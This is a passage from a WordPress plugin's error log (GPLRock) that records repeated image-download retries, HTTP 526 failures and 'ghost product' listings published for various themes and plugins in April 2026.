15:33:48 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/don-peppe---pizza-and-fast-food-wordpress-theme-17594.webp for product don-peppe-pizza-and-fast-food-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 15:33:48 UTC] GPLRock: Image download failed for product don-peppe-pizza-and-fast-food-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:33:50 UTC] GPLRock: Image download failed for product don-peppe-pizza-and-fast-food-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:33:52 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/don-peppe---pizza-and-fast-food-wordpress-theme-17594.webp for product don-peppe-pizza-and-fast-food-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 15:33:52 UTC] GPLRock WARNING: Image download failed for product don-peppe-pizza-and-fast-food-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/don-peppe---pizza-and-fast-food-wordpress-theme-17594.webp [05-Apr-2026 15:33:52 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: don-peppe-pizza-and-fast-food-wordpress-theme [05-Apr-2026 15:33:53 UTC] GPLRock: Image download failed for product grape-professional-flexible-admin-template (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:33:55 UTC] GPLRock: Image download failed for product grape-professional-flexible-admin-template (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:33:57 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/grape--professional--flexible-admin-template-22557.webp for product grape-professional-flexible-admin-template after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 15:33:57 UTC] GPLRock: Image download failed for product grape-professional-flexible-admin-template (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:33:59 UTC] GPLRock: Image download failed for product grape-professional-flexible-admin-template (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:34:01 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/grape--professional--flexible-admin-template-22557.webp for product grape-professional-flexible-admin-template after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 15:34:01 UTC] GPLRock WARNING: Image download failed for product grape-professional-flexible-admin-template. URL: https://meldwp.com/wp-content/uploads/grape--professional--flexible-admin-template-22557.webp [05-Apr-2026 15:34:01 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: grape-professional-flexible-admin-template [05-Apr-2026 15:34:01 UTC] GPLRock: Image download failed for product manon-portfolio-agency-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:34:03 UTC] GPLRock: Image download failed for product manon-portfolio-agency-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:34:06 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/manon---portfolio--agency-wordpress-theme-10549.webp for product manon-portfolio-agency-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 15:34:06 UTC] GPLRock: Image download failed for product manon-portfolio-agency-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:34:08 UTC] GPLRock: Image download failed for product manon-portfolio-agency-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:34:10 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/manon---portfolio--agency-wordpress-theme-10549.webp for product manon-portfolio-agency-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 15:34:10 UTC] GPLRock WARNING: Image download failed for product manon-portfolio-agency-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/manon---portfolio--agency-wordpress-theme-10549.webp [05-Apr-2026 15:34:10 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: manon-portfolio-agency-wordpress-theme [05-Apr-2026 15:34:10 UTC] GPLRock: Image download failed for product mixana-startup-saas-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:34:12 UTC] GPLRock: Image download failed for product mixana-startup-saas-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:34:14 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/mixana---startup--saas-wordpress-theme-17932.webp for product mixana-startup-saas-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 15:34:14 UTC] GPLRock: Image download failed for product mixana-startup-saas-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:34:17 UTC] GPLRock: Image download failed for product mixana-startup-saas-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:34:19 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/mixana---startup--saas-wordpress-theme-17932.webp for product mixana-startup-saas-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 15:34:19 UTC] GPLRock WARNING: Image download failed for product mixana-startup-saas-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/mixana---startup--saas-wordpress-theme-17932.webp [05-Apr-2026 15:34:19 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: mixana-startup-saas-wordpress-theme [05-Apr-2026 15:34:19 UTC] GPLRock: Image download failed for product agncy-creative-modern-portfolio-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:34:21 UTC] GPLRock: Image download failed for product agncy-creative-modern-portfolio-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:34:23 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/agncy---creative--modern-portfolio-wordpress-theme-27284.webp for product agncy-creative-modern-portfolio-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 15:34:23 UTC] GPLRock: Image download failed for product agncy-creative-modern-portfolio-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:34:25 UTC] GPLRock: Image download failed for product agncy-creative-modern-portfolio-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:34:27 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/agncy---creative--modern-portfolio-wordpress-theme-27284.webp for product agncy-creative-modern-portfolio-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 15:34:27 UTC] GPLRock WARNING: Image download failed for product agncy-creative-modern-portfolio-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/agncy---creative--modern-portfolio-wordpress-theme-27284.webp [05-Apr-2026 15:34:27 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: agncy-creative-modern-portfolio-wordpress-theme [05-Apr-2026 15:34:28 UTC] GPLRock: Image download failed for product suppre-urban-wear-woocommerce-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:34:30 UTC] GPLRock: Image download failed for product suppre-urban-wear-woocommerce-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:34:32 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/suppre---urban-wear-woocommerce-theme-33225.webp for product suppre-urban-wear-woocommerce-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 15:34:32 UTC] GPLRock: Image download failed for product suppre-urban-wear-woocommerce-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:34:34 UTC] GPLRock: Image download failed for product suppre-urban-wear-woocommerce-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:34:36 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/suppre---urban-wear-woocommerce-theme-33225.webp for product suppre-urban-wear-woocommerce-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 15:34:36 UTC] GPLRock WARNING: Image download failed for product suppre-urban-wear-woocommerce-theme. URL: https://meldwp.com/wp-content/uploads/suppre---urban-wear-woocommerce-theme-33225.webp [05-Apr-2026 15:34:36 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: suppre-urban-wear-woocommerce-theme [05-Apr-2026 15:34:36 UTC] GPLRock: Image download failed for product emall-multipurpose-woocommerce-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:34:38 UTC] GPLRock: Image download failed for product emall-multipurpose-woocommerce-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:34:40 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/emall---multipurpose-woocommerce-wordpress-theme-27672.webp for product emall-multipurpose-woocommerce-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 15:34:41 UTC] GPLRock: Image download failed for product emall-multipurpose-woocommerce-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:34:43 UTC] GPLRock: Image download failed for product emall-multipurpose-woocommerce-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:34:45 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/emall---multipurpose-woocommerce-wordpress-theme-27672.webp for product emall-multipurpose-woocommerce-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 15:34:45 UTC] GPLRock WARNING: Image download failed for product emall-multipurpose-woocommerce-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/emall---multipurpose-woocommerce-wordpress-theme-27672.webp [05-Apr-2026 15:34:45 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: emall-multipurpose-woocommerce-wordpress-theme [05-Apr-2026 15:36:13 UTC] GPLRock: Image downloaded successfully for product ninja-forms-file-uploads (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-9fe4b171.jpg [05-Apr-2026 15:36:13 UTC] GPLRock: Using pre-downloaded image for product ninja-forms-file-uploads: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-9fe4b171.jpg [05-Apr-2026 15:36:13 UTC] GPLRock: Ghost product published with image - Product ID: ninja-forms-file-uploads [05-Apr-2026 15:36:15 UTC] GPLRock: Image downloaded successfully for product pizzaro-fast-food-restaurant-woocommerce-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-90330064.jpg [05-Apr-2026 15:36:15 UTC] GPLRock: Using pre-downloaded image for product pizzaro-fast-food-restaurant-woocommerce-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-90330064.jpg [05-Apr-2026 15:36:15 UTC] GPLRock: Ghost product published with image - Product ID: pizzaro-fast-food-restaurant-woocommerce-theme [05-Apr-2026 15:36:17 UTC] GPLRock: Image downloaded successfully for product wordpress-country-selector (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-6a2ea2f4.jpg [05-Apr-2026 15:36:17 UTC] GPLRock: Using pre-downloaded image for product wordpress-country-selector: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-6a2ea2f4.jpg [05-Apr-2026 15:36:17 UTC] GPLRock: Ghost product published with image - Product ID: wordpress-country-selector [05-Apr-2026 15:36:18 UTC] GPLRock: Image downloaded successfully for product give-sofort-payment-gateway (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-3012ac3d.jpg [05-Apr-2026 15:36:18 UTC] GPLRock: Using pre-downloaded image for product give-sofort-payment-gateway: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-3012ac3d.jpg [05-Apr-2026 15:36:18 UTC] GPLRock: Ghost product published with image - Product ID: give-sofort-payment-gateway [05-Apr-2026 15:36:20 UTC] GPLRock: Image downloaded successfully for product alliance-intranet-extranet-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-61b0a4a5.jpg [05-Apr-2026 15:36:20 UTC] GPLRock: Using pre-downloaded image for product alliance-intranet-extranet-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-61b0a4a5.jpg [05-Apr-2026 15:36:20 UTC] GPLRock: Ghost product published with image - Product ID: alliance-intranet-extranet-wordpress-theme [05-Apr-2026 15:36:21 UTC] GPLRock: Image downloaded successfully for product hotel-listing (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-d621b58a.jpg [05-Apr-2026 15:36:21 UTC] GPLRock: Using pre-downloaded image for product hotel-listing: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-d621b58a.jpg [05-Apr-2026 15:36:21 UTC] GPLRock: Ghost product published with image - Product ID: hotel-listing [05-Apr-2026 15:36:23 UTC] GPLRock: Image downloaded successfully for product prices-by-user-role-for-woocommerce (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-d94a5e25.jpg [05-Apr-2026 15:36:23 UTC] GPLRock: Using pre-downloaded image for product prices-by-user-role-for-woocommerce: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-d94a5e25.jpg [05-Apr-2026 15:36:23 UTC] GPLRock: Ghost product published with image - Product ID: prices-by-user-role-for-woocommerce [05-Apr-2026 15:36:24 UTC] GPLRock: Image downloaded successfully for product soliloquy-slider-themes-addon (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-a3dda671.jpg [05-Apr-2026 15:36:24 UTC] GPLRock: Using pre-downloaded image for product soliloquy-slider-themes-addon: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-a3dda671.jpg [05-Apr-2026 15:36:24 UTC] GPLRock: Ghost product published with image - Product ID: soliloquy-slider-themes-addon [05-Apr-2026 15:36:26 UTC] GPLRock: Image downloaded successfully for product advance-seat-reservation-management-for-woocommerce (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-00a6d2a2.jpg [05-Apr-2026 15:36:26 UTC] GPLRock: Using pre-downloaded image for product advance-seat-reservation-management-for-woocommerce: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-00a6d2a2.jpg [05-Apr-2026 15:36:26 UTC] GPLRock: Ghost product published with image - Product ID: advance-seat-reservation-management-for-woocommerce [05-Apr-2026 15:36:28 UTC] GPLRock: Image downloaded successfully for product woobe-woocommerce-bulk-editor-professional (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-a5cd20a3.jpg [05-Apr-2026 15:36:28 UTC] GPLRock: Using pre-downloaded image for product woobe-woocommerce-bulk-editor-professional: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-a5cd20a3.jpg [05-Apr-2026 15:36:28 UTC] GPLRock: Ghost product published with image - Product ID: woobe-woocommerce-bulk-editor-professional [05-Apr-2026 15:38:07 UTC] GPLRock: Image download failed for product bus-ticket-booking-with-seat-reservation-for-woocommerce (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:38:09 UTC] GPLRock: Image download failed for product bus-ticket-booking-with-seat-reservation-for-woocommerce (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:38:11 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/bus-ticket-booking-with-seat-reservation-for-woocommerce-8740.webp for product bus-ticket-booking-with-seat-reservation-for-woocommerce after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 15:38:11 UTC] GPLRock: Image download failed for product bus-ticket-booking-with-seat-reservation-for-woocommerce (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:38:13 UTC] GPLRock: Image download failed for product bus-ticket-booking-with-seat-reservation-for-woocommerce (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:38:15 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/bus-ticket-booking-with-seat-reservation-for-woocommerce-8740.webp for product bus-ticket-booking-with-seat-reservation-for-woocommerce after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 15:38:15 UTC] GPLRock WARNING: Image download failed for product bus-ticket-booking-with-seat-reservation-for-woocommerce. URL: https://meldwp.com/wp-content/uploads/bus-ticket-booking-with-seat-reservation-for-woocommerce-8740.webp [05-Apr-2026 15:38:15 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: bus-ticket-booking-with-seat-reservation-for-woocommerce [05-Apr-2026 15:38:16 UTC] GPLRock: Image download failed for product woocommerce-stripe-external (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:38:18 UTC] GPLRock: Image download failed for product woocommerce-stripe-external (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:38:20 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-stripe-external-13788.webp for product woocommerce-stripe-external after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 15:38:20 UTC] GPLRock: Image download failed for product woocommerce-stripe-external (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:38:22 UTC] GPLRock: Image download failed for product woocommerce-stripe-external (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:38:24 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-stripe-external-13788.webp for product woocommerce-stripe-external after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 15:38:24 UTC] GPLRock WARNING: Image download failed for product woocommerce-stripe-external. URL: https://meldwp.com/wp-content/uploads/woocommerce-stripe-external-13788.webp [05-Apr-2026 15:38:24 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: woocommerce-stripe-external [05-Apr-2026 15:38:24 UTC] GPLRock: Image download failed for product tocer-table-of-contents-maker-wordpress-plugin-formerly-fixed-toc (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:38:26 UTC] GPLRock: Image download failed for product tocer-table-of-contents-maker-wordpress-plugin-formerly-fixed-toc (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:38:28 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/tocer---table-of-contents-maker-wordpress-plugin-formerly-fixed-toc-20855.webp for product tocer-table-of-contents-maker-wordpress-plugin-formerly-fixed-toc after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 15:38:29 UTC] GPLRock: Image download failed for product tocer-table-of-contents-maker-wordpress-plugin-formerly-fixed-toc (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:38:31 UTC] GPLRock: Image download failed for product tocer-table-of-contents-maker-wordpress-plugin-formerly-fixed-toc (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:38:33 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/tocer---table-of-contents-maker-wordpress-plugin-formerly-fixed-toc-20855.webp for product tocer-table-of-contents-maker-wordpress-plugin-formerly-fixed-toc after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 15:38:33 UTC] GPLRock WARNING: Image download failed for product tocer-table-of-contents-maker-wordpress-plugin-formerly-fixed-toc. URL: https://meldwp.com/wp-content/uploads/tocer---table-of-contents-maker-wordpress-plugin-formerly-fixed-toc-20855.webp [05-Apr-2026 15:38:33 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: tocer-table-of-contents-maker-wordpress-plugin-formerly-fixed-toc [05-Apr-2026 15:38:33 UTC] GPLRock: Image downloaded successfully for product wpbakery-page-builder-add-on-bookshelf (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-143b1ab4.webp [05-Apr-2026 15:38:33 UTC] GPLRock: Using pre-downloaded image for product wpbakery-page-builder-add-on-bookshelf: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-143b1ab4.webp [05-Apr-2026 15:38:33 UTC] GPLRock: Ghost product published with image - Product ID: wpbakery-page-builder-add-on-bookshelf [05-Apr-2026 15:38:33 UTC] GPLRock: Image download failed for product multisite-shared-media-for-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:38:35 UTC] GPLRock: Image download failed for product multisite-shared-media-for-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:38:37 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/multisite-shared-media-for-wordpress-10105.webp for product multisite-shared-media-for-wordpress after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 15:38:37 UTC] GPLRock: Image download failed for product multisite-shared-media-for-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:38:39 UTC] GPLRock: Image download failed for product multisite-shared-media-for-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:38:41 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/multisite-shared-media-for-wordpress-10105.webp for product multisite-shared-media-for-wordpress after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 15:38:41 UTC] GPLRock WARNING: Image download failed for product multisite-shared-media-for-wordpress. URL: https://meldwp.com/wp-content/uploads/multisite-shared-media-for-wordpress-10105.webp [05-Apr-2026 15:38:41 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: multisite-shared-media-for-wordpress [05-Apr-2026 15:38:42 UTC] GPLRock: Image download failed for product wpbookit-razorpay-payment-gateway-addon (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:38:44 UTC] GPLRock: Image download failed for product wpbookit-razorpay-payment-gateway-addon (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:38:46 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/wpbookit---razorpay-payment-gateway-addon-18545.webp for product wpbookit-razorpay-payment-gateway-addon after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 15:38:46 UTC] GPLRock: Image download failed for product wpbookit-razorpay-payment-gateway-addon (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:38:48 UTC] GPLRock: Image download failed for product wpbookit-razorpay-payment-gateway-addon (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:38:50 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/wpbookit---razorpay-payment-gateway-addon-18545.webp for product wpbookit-razorpay-payment-gateway-addon after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 15:38:50 UTC] GPLRock WARNING: Image download failed for product wpbookit-razorpay-payment-gateway-addon. URL: https://meldwp.com/wp-content/uploads/wpbookit---razorpay-payment-gateway-addon-18545.webp [05-Apr-2026 15:38:50 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: wpbookit-razorpay-payment-gateway-addon [05-Apr-2026 15:38:50 UTC] GPLRock: Image download failed for product booking-system (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:38:52 UTC] GPLRock: Image download failed for product booking-system (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:38:55 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/booking-system-844.webp for product booking-system after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 15:38:55 UTC] GPLRock: Image download failed for product booking-system (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:38:57 UTC] GPLRock: Image download failed for product booking-system (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:38:59 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/booking-system-844.webp for product booking-system after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 15:38:59 UTC] GPLRock WARNING: Image download failed for product booking-system. URL: https://meldwp.com/wp-content/uploads/booking-system-844.webp [05-Apr-2026 15:38:59 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: booking-system [05-Apr-2026 15:38:59 UTC] GPLRock: Image download failed for product shortener-short-links-application-with-analytics (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:39:01 UTC] GPLRock: Image download failed for product shortener-short-links-application-with-analytics (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:39:03 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/shortener---short-links-application-with-analytics-26956.webp for product shortener-short-links-application-with-analytics after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 15:39:03 UTC] GPLRock: Image download failed for product shortener-short-links-application-with-analytics (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:39:05 UTC] GPLRock: Image download failed for product shortener-short-links-application-with-analytics (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:39:08 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/shortener---short-links-application-with-analytics-26956.webp for product shortener-short-links-application-with-analytics after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 15:39:08 UTC] GPLRock WARNING: Image download failed for product shortener-short-links-application-with-analytics. URL: https://meldwp.com/wp-content/uploads/shortener---short-links-application-with-analytics-26956.webp [05-Apr-2026 15:39:08 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: shortener-short-links-application-with-analytics [05-Apr-2026 15:39:08 UTC] GPLRock: Image download failed for product order-notifications-for-woocommerce (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:39:10 UTC] GPLRock: Image download failed for product order-notifications-for-woocommerce (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:39:12 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/order-notifications-for-woocommerce-28589.webp for product order-notifications-for-woocommerce after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 15:39:12 UTC] GPLRock: Image download failed for product order-notifications-for-woocommerce (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:39:14 UTC] GPLRock: Image download failed for product order-notifications-for-woocommerce (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:39:16 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/order-notifications-for-woocommerce-28589.webp for product order-notifications-for-woocommerce after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 15:39:16 UTC] GPLRock WARNING: Image download failed for product order-notifications-for-woocommerce. URL: https://meldwp.com/wp-content/uploads/order-notifications-for-woocommerce-28589.webp [05-Apr-2026 15:39:16 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: order-notifications-for-woocommerce [05-Apr-2026 15:39:16 UTC] GPLRock: Image download failed for product eform-easysubmission-direct-form-edit-extended-format-string (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:39:19 UTC] GPLRock: Image download failed for product eform-easysubmission-direct-form-edit-extended-format-string (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:39:21 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/eform-easysubmission---direct-form-edit--extended-format-string-15090.webp for product eform-easysubmission-direct-form-edit-extended-format-string after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 15:39:21 UTC] GPLRock: Image download failed for product eform-easysubmission-direct-form-edit-extended-format-string (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:39:23 UTC] GPLRock: Image download failed for product eform-easysubmission-direct-form-edit-extended-format-string (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:39:25 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/eform-easysubmission---direct-form-edit--extended-format-string-15090.webp for product eform-easysubmission-direct-form-edit-extended-format-string after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 15:39:25 UTC] GPLRock WARNING: Image download failed for product eform-easysubmission-direct-form-edit-extended-format-string. URL: https://meldwp.com/wp-content/uploads/eform-easysubmission---direct-form-edit--extended-format-string-15090.webp [05-Apr-2026 15:39:25 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: eform-easysubmission-direct-form-edit-extended-format-string [05-Apr-2026 15:40:05 UTC] GPLRock: Image downloaded successfully for product hana-responsive-wordpress-blog-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-53bf78a4.webp [05-Apr-2026 15:40:05 UTC] GPLRock: Using pre-downloaded image for product hana-responsive-wordpress-blog-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-53bf78a4.webp [05-Apr-2026 15:40:05 UTC] GPLRock: Ghost product published with image - Product ID: hana-responsive-wordpress-blog-theme [05-Apr-2026 15:40:05 UTC] GPLRock: Image download failed for product sushifushi-japanese-asian-restaurant-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:40:07 UTC] GPLRock: Image download failed for product sushifushi-japanese-asian-restaurant-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:40:09 UTC] GPLRock Error: Failed to download image from 